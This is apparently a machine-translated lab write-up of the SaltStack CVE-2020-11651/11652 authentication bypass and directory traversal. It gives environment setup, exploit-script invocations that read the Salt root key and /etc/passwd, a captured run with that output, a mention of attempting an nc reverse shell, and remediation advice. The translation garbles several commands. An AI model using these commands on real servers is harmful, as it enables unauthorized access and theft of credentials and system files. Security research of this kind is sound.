I. Vulnerability description
SaltStack is a Python based C/S architecture configuration management tool, is a server infrastructure centralized management platform, with configuration management, remote execution, monitoring and other functions, based on Python language implementation. Build with lightweight Message Queue (ZeroMQ) and Python third-party modules (Pyzmq, PyCrypto, Pyjinjia2, Python-MsgPack, PyYAML, etc.).
In CVE-2020-11651 authentication bypass vulnerability, an attacker can bypass Salt Master’s authentication logic by constructing a malicious request to invoke related unauthorized functions, thus creating a remote command execution vulnerability. In cVE-2020-11652 directory traversal vulnerability, an attacker can read arbitrary files on the server by constructing malicious requests.
Second, the impact version && security version
Affects version
SaltStack < 2019.2.4
SaltStack < 3000.2
Security version
2019.2.4
3000.2
3. Environment construction
Manual Environment setup
SaltStack Package Repo (mirrors.nju.edu.cn/saltstack/2…
1. Download files
Wget - O - https://repo.saltstack.com/apt/ubuntu/16.04/amd64/2019.2/SALTSTACK-GPG-KEY.pub | sudo apt -- the key to addCopy the code
2, save the file/etc/apt/sources list. D/saltstack. List
Deb http://repo.saltstack.com/apt/ubuntu/16.04/amd64/2019.2 xenial mainCopy the code3, run,
sudo apt-get update
Copy the code4. Install other dependencies
sudo apt-get install salt-master
sudo apt-get install salt-minion
sudo apt-get install salt-ssh
sudo apt-get install salt-syndic
sudo apt-get install salt-cloud
sudo apt-get install salt-api
Copy the code5. Restart the service
sudo systemctl restart salt-minion
Copy the codeSuccessful installation
Docker image mode:
docker pull vulfocus/saltstack-cve_2020_11651
Copy the codePull the mirror
Run successfully
Iv. Recurrence of vulnerabilities:
Python3 exp. P y -m 192.168.0.102Copy the codeRead: root_key
Executing the command succeeded
Read/etc/passwd
Python3 exp. Py -m 192.168.0.102 -c master -r /etc/passwdCopy the code
The command in docker is not complete enough to execute nc rebound for many times. The above command can basically read and related operations.
Fetching root_key and support reading /etc/passwd will still work
Related operation process:
Root @ kali: # python3 exp. P y -m 192.168.0.102 / usr/local/lib/python3.7 / dist - packages/salt/ext/tornado/httputil py: 107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, And in 3.8 it will stop working class HTTPHeaders (collections. MutableMapping) : [+] Checking salt-master (192.168.0.102:4506) Checking salt-master status... [+] Read root_key... root key: 5 a4rat + lafu37VuU6eiT8Ygcegu9VErP7DQaJxb7JxCgW / 50 yvp9dgykag0htyxxqzvwamnojao = root @ kali: # python3 exp. P y -m 192.168.0.102 - master c - r/etc/passwd/usr/local/lib/python3.7 / dist - packages/salt/ext/tornado/httputil py: 107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, And in 3.8 it will stop working class HTTPHeaders (collections. MutableMapping) : [+] Checking salt-master (192.168.0.102:4506) Checking salt-master status... [+] Read root_key... root key: 5a4RAt+lafu37VuU6eiT8Ygcegu9VErP7DQaJxb7JxCgW/50yvp9DgYKAG0HtyxXqzVwAMnoJAo= root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false Got response for attempting master shell: {'jid': '20200505175322193300', 'tag': 'salt/run/20200505175322193300'}. Looks promising!Copy the codeIv. Restoration plan
1. Upgrade SaltStack to a later version. Before the upgrade, you are advised to back up snapshot data.
2. Set the SaltStack to automatically update and obtain corresponding patches in time.
3. Set the default listening ports of the Salt Master (default 4505 and 4506) to disable public network access or only open to trusted objects.
Reference:
www.cnblogs.com/8ling/p/128…
Mirrors.nju.edu.cn/saltstack/2…
Github.com/jasperla/CV…
Github.com/fofapro/vul…
Github.com/bravery9/Sa…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…